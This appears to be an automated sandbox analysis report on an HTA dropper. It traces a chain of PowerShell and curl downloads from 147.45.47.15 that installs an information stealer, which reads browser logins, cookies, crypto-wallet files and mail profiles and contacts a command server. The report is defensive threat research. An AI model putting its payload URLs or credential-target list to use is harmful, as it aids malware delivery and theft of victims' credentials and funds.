            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation TimeZoneKeyNameJump to behavior
            Source: C:\Windows\Temp\Launcher.exeCode function: 6_2_00B6FCE5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_00B6FCE5
            Source: C:\Windows\Temp\Launcher.exeCode function: 6_2_00B6C9DB LookupAccountNameW,GetLastError,malloc,LookupAccountNameW,GetLastError,free,6_2_00B6C9DB
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DD76A0 GetTimeZoneInformation,12_2_00007FF6F1DD76A0
            Source: C:\Windows\Temp\Launcher.exeCode function: 6_2_00B5B4F0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3,GetVersionExW,#1202,#538,#800,#6112,#2613,#384,#2089,#1197,#520,#986,#4604,#1197,#5977,6_2_00B5B4F0
            Source: C:\Windows\Temp\Launcher.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: io12j1es.2tm.exe PID: 7540, type: MEMORYSTR
            Source: Yara matchFile source: 12.0.io12j1es.2tm.exe.7ff6f1d50000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.io12j1es.2tm.exe.7ff6f1d50000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: Process Memory Space: io12j1es.2tm.exe PID: 7540, type: MEMORYSTR
            Source: Yara matchFile source: C:\Windows\Temp\io12j1es.2tm.exe, type: DROPPED
            Source: io12j1es.2tm.exe, 0000000C.00000002.2109507353.000001F1574BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum-LTC\config
            Source: io12j1es.2tm.exe, 0000000C.00000002.2109507353.000001F1574BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectronCash\wallets
            Source: io12j1es.2tm.exe, 0000000C.00000003.1927283382.000001F157556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ny1aaXAgMjMuMDEgKHg2NCkgWzIzLjAxXQpNb3ppbGxhIEZpcmVmb3ggKHg2NCBlbi1VUykgWzExOC4wLjFdCk1vemlsbGEgTWFpbnRlbmFuY2UgU2VydmljZSBbMTE4LjAuMV0KTWljcm9zb2Z0IE9mZmljZSBQcm9mZXNzaW9uYWwgUGx1cyAyMDE5IC0gZW4tdXMgWzE2LjAuMTY4MjcuMjAxMzBdCk1pY3Jvc29mdCBWaXN1YWwgQysrIDIwMjIgWDY0IEFkZGl0aW9uYWwgUnVudGltZSAtIDE0LjM2LjMyNTMyIFsxNC4zNi4zMjUzMl0KT2ZmaWNlIDE2IENsaWNrLXRvLVJ1biBMaWNlbnNpbmcgQ29tcG9uZW50IFsxNi4wLjE2ODI3LjIwMTMwXQpPZmZpY2UgMTYgQ2xpY2stdG8tUnVuIEV4dGVuc2liaWxpdHkgQ29tcG9uZW50IDY0LWJpdCBSZWdpc3RyYXRpb24gWzE2LjAuMTY4MjcuMjAwNTZdCkFkb2JlIEFjcm9iYXQgKDY0LWJpdCkgWzIzLjAwNi4yMDMyMF0KTWljcm9zb2Z0IFZpc3VhbCBDKysgMjAyMiBYNjQgTWluaW11bSBSdW50aW1lIC0gMTQuMzYuMzI1MzIgWzE0LjM2LjMyNTMyXQpHb29nbGUgQ2hyb21lIFsxMTcuMC41OTM4LjEzMl0KTWljcm9zb2Z0IEVkZ2UgWzExNy4wLjIwNDUuNDddCk1pY3Jvc29mdCBFZGdlIFVwZGF0ZSBbMS4zLjE3Ny4xMV0KTWljcm9zb2Z0IEVkZ2UgV2ViVmlldzIgUnVudGltZSBbMTE3LjAuMjA0NS40N10KSmF2YSBBdXRvIFVwZGF0ZXIgWzIuOC4zODEuOV0KSmF2YSA4IFVwZGF0ZSAzODEgWzguMC4zODEwLjldCk1pY3Jvc29mdCBWaXN1YWwgQysrIDIwMTUtMjAyMiBSZWRpc3RyaWJ1dGFibGUgKHg2NCkgLSAxNC4zNi4zMjUzMiBbMTQuMzYuMzI1MzIuMF0KT2ZmaWNlIDE2IENsaWNrLXRvLVJ1biBFeHRlbnNpYmlsaXR5IENvbXBvbmVudCBbMTYuMC4xNjgyNy4yMDEzMF0K
            Source: io12j1es.2tm.exe, 0000000C.00000002.2109507353.000001F1574BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodus\exodus.wallet
            Source: io12j1es.2tm.exe, 0000000C.00000003.1927283382.000001F157584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\Local State
            Source: io12j1es.2tm.exe, 0000000C.00000002.2109507353.000001F1574BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum\keystore
            Source: powershell.exe, 00000005.00000002.1783191813.0000000006F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
            Source: C:\Windows\Temp\io12j1es.2tm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.oldJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOCKJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENTJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001Jump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: io12j1es.2tm.exe PID: 7540, type: MEMORYSTR
            Source: Yara matchFile source: 12.0.io12j1es.2tm.exe.7ff6f1d50000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.io12j1es.2tm.exe.7ff6f1d50000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: Process Memory Space: io12j1es.2tm.exe PID: 7540, type: MEMORYSTR
            Source: Yara matchFile source: C:\Windows\Temp\io12j1es.2tm.exe, type: DROPPED
            Source: C:\Windows\Temp\Launcher.exeCode function: 6_2_00B64899 #1662,#540,lstrcpyW,CreateBindCtx,MkParseDisplayName,#2644,#2810,#800,lstrlenW,#2810,#2644,#800,6_2_00B64899
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            11
            Disable or Modify Tools
            1
            OS Credential Dumping
            12
            System Time Discovery
            Remote Services1
            Archive Collected Data
            12
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Command and Scripting Interpreter
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            LSASS Memory1
            Account Discovery
            Remote Desktop Protocol2
            Data from Local System
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            PowerShell
            Logon Script (Windows)1
            Access Token Manipulation
            2
            Obfuscated Files or Information
            Security Account Manager4
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Screen Capture
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
            Process Injection
            1
            DLL Side-Loading
            NTDS27
            System Information Discovery
            Distributed Component Object Model11
            Email Collection
            2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading
            LSA Secrets131
            Security Software Discovery
            SSH2
            Clipboard Data
            23
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
            Virtualization/Sandbox Evasion
            Cached Domain Credentials31
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSync2
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            System Network Configuration Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578050 Sample: script.hta Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 50 api.ipify.org 2->50 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 Antivirus detection for URL or domain 2->66 68 10 other signatures 2->68 11 mshta.exe 1 2->11         started        signatures3 process4 signatures5 72 Suspicious command line found 11->72 14 cmd.exe 1 11->14         started        process6 signatures7 74 Bypasses PowerShell execution policy 14->74 17 powershell.exe 15 19 14->17         started        21 curl.exe 1 14->21         started        24 conhost.exe 14->24         started        process8 dnsIp9 44 C:\Windows\Temp\iviewers.dll, PE32 17->44 dropped 46 C:\Windows\Temp\Launcher.exe, PE32 17->46 dropped 58 Found many strings related to Crypto-Wallets (likely being stolen) 17->58 60 Powershell drops PE file 17->60 26 Launcher.exe 2 17->26         started        52 147.45.47.15, 49731, 49734, 49738 FREE-NET-ASFREEnetEU Russian Federation 21->52 file10 signatures11 process12 signatures13 70 Adds a directory exclusion to Windows Defender 26->70 29 io12j1es.2tm.exe 6 26->29         started        33 powershell.exe 23 26->33         started        35 powershell.exe 16 26->35         started        process14 dnsIp15 54 193.3.19.151, 15666, 49740 ARNES-NETAcademicandResearchNetworkofSloveniaSI Denmark 29->54 56 api.ipify.org 104.26.12.205, 443, 49741 CLOUDFLARENETUS United States 29->56 76 Multi AV Scanner detection for dropped file 29->76 78 Tries to steal Mail credentials (via file / registry access) 29->78 80 Machine Learning detection for dropped file 29->80 84 3 other signatures 29->84 82 Loading BitLocker PowerShell Module 33->82 38 WmiPrvSE.exe 33->38         started        40 conhost.exe 33->40         started        48 C:\Windows\Temp\io12j1es.2tm.exe, PE32+ 35->48 dropped 42 conhost.exe 35->42         started        file16 signatures17 process18

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            script.hta15%VirustotalBrowse
            script.hta8%ReversingLabsText.Malware.Boxter
            SourceDetectionScannerLabelLink
            C:\Windows\Temp\io12j1es.2tm.exe100%Joe Sandbox ML
            C:\Windows\Temp\Launcher.exe0%ReversingLabs
            C:\Windows\Temp\io12j1es.2tm.exe83%ReversingLabsWin64.Trojan.MeduzaStealer
            C:\Windows\Temp\iviewers.dll21%ReversingLabsWin32.Trojan.Sonbokli
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://crl.mD0%Avira URL Cloudsafe
            http://147.45.47.15/script.ps11gU0%Avira URL Cloudsafe
            http://147.45.47.15/duschno.exe100%Avira URL Cloudmalware
            http://147.45.47.15/script.ps10%Avira URL Cloudsafe
            http://147.45.47.15D0%Avira URL Cloudsafe
            http://147.45.47.150%Avira URL Cloudsafe
            http://147.45.47.15/Launcher.exe0%Avira URL Cloudsafe
            http://147.45.47.15/iviewers.dll0%Avira URL Cloudsafe
            http://147.45.47.15/iviewers.dllXR0%Avira URL Cloudsafe
            http://147.45.4zY0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            api.ipify.org
            104.26.12.205
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              http://147.45.47.15/script.ps1true
              • Avira URL Cloud: safe
              unknown
              http://147.45.47.15/duschno.exetrue
              • Avira URL Cloud: malware
              unknown
              https://api.ipify.org/false
                high
                http://147.45.47.15/iviewers.dlltrue
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabio12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A02E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A016000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1897946678.000001F15A015000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFio12j1es.2tm.exe, 0000000C.00000003.1906316117.000001F15926F000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://duckduckgo.com/ac/?q=io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A02E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A016000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1897946678.000001F15A015000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://go.microsoft.coio12j1es.2tm.exe, 0000000C.00000003.1927283382.000001F157584000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Licensepowershell.exe, 00000007.00000002.1805117636.0000000005679000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.io12j1es.2tm.exe, 0000000C.00000003.1923710283.000001F15754F000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A02E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1898724678.000001F159FA8000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A0A9000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A07F000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://147.45.47.15/Launcher.exepowershell.exe, 00000005.00000002.1773560054.0000000004694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1773560054.0000000004950000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://api.ipify.orgio12j1es.2tm.exe, 0000000C.00000002.2109507353.000001F1574C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiio12j1es.2tm.exe, 0000000C.00000003.1923710283.000001F15754F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installio12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A00E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A01F000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A038000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1900063983.000001F159FA9000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899926649.000001F157550000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A084000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A003000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchio12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A02E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1898724678.000001F159FA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/powershell.exe, 00000007.00000002.1805117636.0000000005679000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1779711117.00000000055A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1805117636.0000000005679000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1773560054.0000000004541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1797529173.0000000004611000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.mDpowershell.exe, 00000005.00000002.1781715663.0000000006C81000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94io12j1es.2tm.exe, 0000000C.00000003.1923710283.000001F15754F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1779711117.00000000055A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1805117636.0000000005679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgio12j1es.2tm.exe, 0000000C.00000003.1923710283.000001F15754F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoio12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A02E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.1797529173.0000000004766000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.1797529173.0000000004766000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.1797529173.0000000004766000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://go.micropowershell.exe, 00000005.00000002.1773560054.0000000004D72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://contoso.com/Iconpowershell.exe, 00000007.00000002.1805117636.0000000005679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://147.45.47.15Dpowershell.exe, 00000005.00000002.1773560054.0000000004950000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A02E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A016000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1897946678.000001F15A015000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
